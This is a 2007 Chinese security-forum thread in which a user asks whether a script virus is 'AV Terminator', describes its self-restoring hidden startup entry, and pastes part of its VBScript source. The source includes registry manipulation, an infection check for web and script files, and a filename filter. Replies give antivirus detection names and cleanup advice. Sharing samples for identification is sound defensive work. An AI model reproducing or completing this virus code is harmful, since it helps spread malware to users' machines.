这是不是AV终结者？

显示全部楼层 · 发表于 2007-11-20 18:36:33

在启动项下生成隐藏的load指向C:\windows\system32\Administrator.vbs
删除该项后又会重新生成

====Administrator.vbs部分代码：=====
'Administrator4
'HJLMRRQRWYOZX2_25
Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps = Nothing
End Sub
Function ReadReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
      tmps.RegWrite strkey, Value
Else
      tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub
'WQKAULMNKKG2_25
'HJLMRRQRWYOZX2_21
Function IsSexFile(fname)
IsSexFile = False
If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
            InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
            InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
      IsSexFile = True
End If
End Function
Function Isinfected(buffer, ftype)
Isinfected = True
Select Case ftype
      Case "hta", "htm" , "html" , "asp", "vbs"
         If InStr(buffer, Head_V) = 0 Then
            Isinfected = False
         End If
      Case Else
         Isinfected = True
End Select
End Function
'WQKAULMNKKG2_21
'HJLMRRQRWYOZX2_22
Function GetSFolder(p)
Dim objfso
Set objfso = CreateObject(GetFSOName())
GetSFolder = objfso.GetSpecialFolder(p) & "\"
Set objfso = Nothing
End Function
Function GetUserName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
UserName = ReadReg(Value)
If UserName = "" Then
      GetUserName = "Administrator"
Else
      GetUserName = UserName
End If
End Function
Function GetFSOName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
UserName = ReadReg(Value)
If UserName = "" Then
      GetUserName = "Scripting.FileSystemObject"
Else
      GetFSOName = UserName
End If
End Function
Function GetHeadTail(l)
Dim Str , buffer
If l = 0 Then
      GetHeadTail = "'" & GetUserName()
Else
      buffer = GetUserName()
      Str = ""
      For i = 1 To Len(buffer)

显示全部楼层 · 发表于 2007-11-20 18:40:22

Starting the file scan:

Begin scan in 'E:\Administrator.rar'
E:\Administrator.rar
  [0] Archive type: RAR
  --> Administrator.vbs
   [DETECTION] Contains detection pattern of the VBS script virus VBS/Changeset.A
   [INFO]    The file was deleted!

显示全部楼层 · 发表于 2007-11-20 18:40:46

卡巴扫描过~

显示全部楼层 · 发表于 2007-11-20 18:45:58

瑞星病毒查杀结果报告

清除病毒种类列表：
病毒： Script.VBS.Agent.ai

用户来源：互联网

软件版本：20.19.11

显示全部楼层 · 发表于 2007-11-20 18:57:40

不是。。

显示全部楼层 · 发表于 2007-11-20 19:09:15

有没有专杀啊？

显示全部楼层 · 发表于 2007-11-20 19:10:01

Windows清理助手就能解决。。

显示全部楼层 · 发表于 2007-11-20 19:28:31

的确 AV 终结者

真正名副其实但不是那个名声大噪的 AV 终结者

显示全部楼层 · 发表于 2007-11-20 19:48:11

McAfee miss

显示全部楼层 · 发表于 2007-11-20 20:14:45

卡巴没报

[病毒样本] 这是不是AV终结者？

本帖子中包含更多资源

浏览过的版块